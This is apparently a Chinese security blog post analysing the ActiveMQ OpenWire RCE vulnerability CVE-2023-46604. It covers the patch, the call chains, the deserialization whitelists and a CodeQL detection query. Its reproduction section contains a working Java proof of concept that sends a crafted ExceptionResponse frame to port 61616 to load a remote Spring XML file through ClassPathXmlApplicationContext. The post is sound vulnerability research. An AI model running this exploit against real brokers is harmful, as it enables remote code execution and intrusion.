ActiveMQ CVE-2023-46604漏洞分析

ActiveMQ 的RCE 漏洞,直接从61616 端口默认协议上可触发,影响不小。

偷懒了当时只是验证了下没写分析,先在还得从头开始捡。

0x01 补丁分析

https://github.com/apache/activemq/commit/958330df26cf3d5cdb63905dc2c6882e98781d8f

upload successful

分析出补丁位置不难,经典的org.springframework.context.support.ClassPathXmlApplicationContext 利用场景,以前出过几次,印象中最近的是浅蓝的postgresql 用的就是这个sink利用链。

0x02 漏洞分析

已知sink点为 BaseDataStreamMarshaller#createThrowable,路径在org.apache.activemq.openwire.v12,其中openwire有不同版本,v开头,这里已v12 为例,往上回溯

1
2
3
4
5
6
7
8
9
10
BaseDataStreamMarshaller#createThrowable
	BaseDataStreamMarshaller#tightUnmarsalThrowable
	BaseDataStreamMarshaller#looseUnmarsalThrowable
    	MessageAckMarshaller#tightUnmarshal
        ConnectionErrorMarshaller#tightUnmarshal
        ExceptionResponseMarshaller#tightUnmarshal
        	OpenWireFormat#doUnmarshal
            	OpenWireFormat#unmarshal(ByteSequence sequence)
                OpenWireFormat#unmarshal(DataInput dis)
            OpenWireFormat#tightUnmarshalNestedObject

其实跟踪到这里已经ok了,搭配上断点调试,已经可以定位出漏洞触发路径。

2.1 run->sink链

后续的触发路径还有很多,这里以tcp为例

1
2
3
4
OpenWireFormat#unmarshal
	TcpTransport#readCommand
    	TcpTransport#doRun
        	TcpTransport#run

TcpTransport 是个Runable 类,run 是其接口,那么只要启动TcpTransport线程,那么到sink链就通了

upload successful

2.2 source->start链

从source 继续往上推

1
2
3
4
5
socket.getInputStream
	TcpTransport#initializeStreams
		TcpTransport#connect
        	TcpTransport#doStart
				TransportThreadSupport#doStart

TransportThreadSupport#doStart

1
2
3
4
5
protected void doStart() throws Exception {
    runner = new Thread(null, this, "ActiveMQ Transport: " + toString(), stackSize);
    runner.setDaemon(daemon);
    runner.start();
}

TcpTransport#doStart

1
2
3
4
5
6
7
8
9
public class TcpTransport extends TransportThreadSupport implements Transport, Service, Runnable {
	TcpTransport extends TransportThreadSupport

    protected void doStart() throws Exception {
        connect();
        stoppedLatch.set(new CountDownLatch(1));
        super.doStart();
    }
}

2.3 start -> run

疑问:
Java thread#start 是在JNI实现上,实际调用的是run 接口,这在代码AST 上是无法追踪的,如何完善这一块?

0x03 漏洞复现

3.1 环境

1
2
3
$ vim bin/env
ACTIVEMQ_DEBUG_OPTS="-Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=5005"
$ ./bin/activemq

3.2 POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
public class ExceptionResponseMarshallerPoc {
    private static final String BROKER_URL = "tcp://localhost:61616";
    private static final Boolean NON_TRANSACTED = false;
    private static final long TIMEOUT = 20000;

    public static void main(String[] args) throws IOException {
        String ip=""; //服务器端ip地址
        int port=61616; //端口号
        Socket sck=new Socket(ip,port);
        //2.传输内容
        DataOutputStream out = null;
        DataInputStream in = null;
        out = new DataOutputStream(new BufferedOutputStream(new
                FileOutputStream("test.txt")));
        out.writeInt(32);
        out.writeByte(31);
        out.writeInt(1);
        out.writeBoolean(true);
        out.writeInt(1);
        out.writeBoolean(true);
        out.writeBoolean(true);
        out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext");
        out.writeBoolean(true);
        out.writeUTF("http://127.0.0.1/spring_poc.xml");
        out.close();
        in = new DataInputStream(new BufferedInputStream(new FileInputStream("test.txt")));
        OutputStream os=sck.getOutputStream();
        int length = in.available();
        byte[] buf = new byte[length];
        in.readFully(buf);
        os.write(buf);
        in.close();
        sck.close();
    }
}

0x04 横向拓展

4.1 其他协议

activemq 有其他协议,大家往往关注的是默认的61616 tcp协议,其实从原理分析过程来看,其他协议也存在问题。

例如udp 协议上也有问题:
upload successful

不过最终的修复点是在sink点上,对newInstance 增加了过滤,因此这些路径也都被修复了。

4.2 安全手段

4.2.1 反序列化安全

4.2.1.1 InputStream

MessageDatabaseObjectInputStream

MessageDatabaseObjectInputStream

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
private static class MessageDatabaseObjectInputStream extends ObjectInputStream {

    public MessageDatabaseObjectInputStream(InputStream is) throws IOException {
        super(is);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        if (!(desc.getName().startsWith("java.lang.")
                || desc.getName().startsWith("com.thoughtworks.xstream")
                || desc.getName().startsWith("java.util.")
                || desc.getName().length() > 2 && desc.getName().substring(2).startsWith("java.util.") // Allow arrays
                || desc.getName().startsWith("org.apache.activemq."))) {
            throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
        }
        return super.resolveClass(desc);
    }
  • 白名单模式
  • 可能还有操作空间的只有xstream/activemq 这几个类
ClassLoadingAwareObjectInputStream

ClassLoadingAwareObjectInputStream.java

1
2
3
4
5
public class ClassLoadingAwareObjectInputStream extends ObjectInputStream {
    public static final String[] serializablePackages;
    static {
        serializablePackages = System.getProperty("org.apache.activemq.SERIALIZABLE_PACKAGES","java.lang,org.apache.activemq,org.fusesource.hawtbuf,com.thoughtworks.xstream.mapper").split(",");
    }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
private void checkSecurity(Class clazz) throws ClassNotFoundException {
    if (trustAllPackages() || clazz.isPrimitive()) {
        return;
    }

    boolean found = false;
    Package thePackage = clazz.getPackage();
    if (thePackage != null) {
        for (String trustedPackage : getTrustedPackages()) {
            if (thePackage.getName().equals(trustedPackage) || thePackage.getName().startsWith(trustedPackage + ".")) {
                found = true;
                break;
            }
        }
        if (!found) {
            throw new ClassNotFoundException("Forbidden " + clazz + "! This class is not trusted to be serialized as ObjectMessage payload. Please take a look at http://activemq.apache.org/objectmessage.html for more information on how to configure trusted classes.");
        }
    }
}
SubSelectorClassObjectInputStream

SubQueueSelectorCacheBroker

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
private static class SubSelectorClassObjectInputStream extends ObjectInputStream {

    public SubSelectorClassObjectInputStream(InputStream is) throws IOException {
        super(is);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        if (!(desc.getName().startsWith("java.lang.")
                || desc.getName().startsWith("com.thoughtworks.xstream")
                || desc.getName().startsWith("java.util.")
                || desc.getName().length() > 2 && desc.getName().substring(2).startsWith("java.util.") // Allow arrays
                || desc.getName().startsWith("org.apache.activemq."))) {
            throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
        }
        return super.resolveClass(desc);
    }
}

4.2.1.2 Object

ActiveMQObjectMessage

ActiveMQObjectMessage.java

1
2
3
4
public class ActiveMQObjectMessage extends ActiveMQMessage implements ObjectMessage, TransientInitializer {
    private transient List<String> trustedPackages = Arrays.asList(ClassLoadingAwareObjectInputStream.serializablePackages);
    private transient boolean trustAllPackages = false;
    protected transient Serializable object;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
private Serializable deserialize(ByteSequence content) throws JMSException {
    Serializable object = null;

    if (content != null) {
        try {
            InputStream is = new ByteArrayInputStream(content);
            if (isCompressed()) {
                is = new InflaterInputStream(is);
            }
            DataInputStream dataIn = new DataInputStream(is);
            ClassLoadingAwareObjectInputStream objIn = new ClassLoadingAwareObjectInputStream(dataIn);
            objIn.setTrustedPackages(trustedPackages);
            objIn.setTrustAllPackages(trustAllPackages);
            try {
                object = (Serializable)objIn.readObject();
            } catch (ClassNotFoundException ce) {
                throw JMSExceptionSupport.create("Failed to build body from content. Serializable class not available to broker. Reason: " + ce, ce);
            } finally {
                dataIn.close();
            }
        } catch (IOException e) {
            throw JMSExceptionSupport.create("Failed to build body from bytes. Reason: " + e, e);
        }
    }
    return object;
}
1
2
3
4
5
6
7
8
9
10
11
public void setTrustedPackages(List<String> trustedPackages) {
    this.trustedPackages = trustedPackages;
}

public boolean isTrustAllPackages() {
    return trustAllPackages;
}

public void setTrustAllPackages(boolean trustAllPackages) {
    this.trustAllPackages = trustAllPackages;
}
ActiveMQStreamMessage
1
2
3
4
5
6
7
8
9
10
public Object readObject() throws JMSException {
    initializeReading();
    try {
        this.dataIn.mark(65);
        if (type == -1) {
        ...
        } else {
            this.dataIn.reset();
            throw new MessageFormatException("unknown type");
        }            
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
public Object readObject() throws JMSException {
    this.checkWriteOnlyBody();
    this.checkBytesInFlight();
    Object result = null;
    Object value = this.facade.peek();
    if (value == null) {
        result = null;
    ...
    } else {
        if (!(value instanceof byte[])) {
            throw new MessageFormatException("Unknown type found in stream");
        }

        byte[] original = (byte[])value;
        result = new byte[original.length];
        System.arraycopy(original, 0, result, 0, original.length);
    }

基本都封死了。

0x05 CodeQL回归验证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
/**
 * @kind path-problem
 */
import java
import NewInstanceConfigFlow::PathGraph
import semmle.code.java.dataflow.DataFlow
import semmle.code.java.dataflow.FlowSources
import semmle.code.java.dataflow.ExternalFlow
 
module NewInstanceConfig implements DataFlow::ConfigSig {
  int fieldFlowBranchLimit() { result = 10 }

  predicate isSource(DataFlow::Node source) {
    source instanceof RemoteFlowSource
  }

  predicate isSink(DataFlow::Node sink) {
    exists(MethodAccess ma | 
        ma.getArgument(0) = sink.asExpr()
      | 
        ma.getMethod().hasName("newInstance") and
        ma.getMethod().getDeclaringType().hasQualifiedName("java.lang.reflect", "Constructor<>")
      )
  }
}

module NewClassConfig implements DataFlow::ConfigSig {
  int fieldFlowBranchLimit() { result = 10 }

  predicate isSource(DataFlow::Node source) {
    source instanceof RemoteFlowSource
  }

  predicate isSink(DataFlow::Node sink) {
    exists(MethodAccess ma | 
        ma.getArgument(0) = sink.asExpr()
      | 
        ma.getMethod().hasName("forName")
        and ma.getMethod().getDeclaringType().hasQualifiedName("java.lang", "Class")
    )
  }
}

module Class2ConstructorConfig implements DataFlow::ConfigSig {
  int fieldFlowBranchLimit() { result = 10 }

  predicate isSource(DataFlow::Node source) {
    exists(MethodAccess ma | 
      ma.getArgument(0) = source.asExpr()
    | 
      ma.getMethod().hasName("forName")
      and ma.getMethod().getDeclaringType().hasQualifiedName("java.lang", "Class")
    )
  }

  predicate isSink(DataFlow::Node sink) {
    exists(MethodAccess ma | 
      ma.getArgument(0) = sink.asExpr()
    | 
      ma.getMethod().hasName("newInstance") and 
      ma.getMethod().getDeclaringType().hasQualifiedName("java.lang.reflect", "Constructor<>")
    )
  }

  predicate isAdditionalFlowStep(DataFlow::Node node1, DataFlow::Node node2) {
    exists(MethodAccess ma | 
      node1.asExpr() = ma.getQualifier() and 
      node2.asExpr() = ma.getArgument(0)
      |
      ma.getMethod().hasName("newInstance") and 
      ma.getMethod().getDeclaringType().hasQualifiedName("java.lang.reflect", "Constructor<>")
    )
  }
}

module NewInstanceConfigFlow = TaintTracking::Global<NewInstanceConfig>;
module NewClassConfigFlow = TaintTracking::Global<NewClassConfig>;
module Class2ConstructorConfigFlow = TaintTracking::Global<Class2ConstructorConfig>;

from NewInstanceConfigFlow::PathNode source, NewInstanceConfigFlow::PathNode sink
  , NewClassConfigFlow::PathNode source2, NewClassConfigFlow::PathNode sink2
  , Class2ConstructorConfigFlow::PathNode source3, Class2ConstructorConfigFlow::PathNode sink3
where NewInstanceConfigFlow::flowPath(source, sink)
  and NewClassConfigFlow::flowPath(source2, sink2)
  and Class2ConstructorConfigFlow::flowPath(source3, sink3)
  and source.getNode() = source2.getNode()
  and sink2.getNode() = source3.getNode()
  and sink.getNode() = sink3.getNode()
select sink, source, sink, "$@ -> $@", source, source.toString()
  , sink2, sink2.toString()

upload successful

0x06 参考

  1. https://github.com/apache/activemq/commit/958330df26cf3d5cdb63905dc2c6882e98781d8f

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true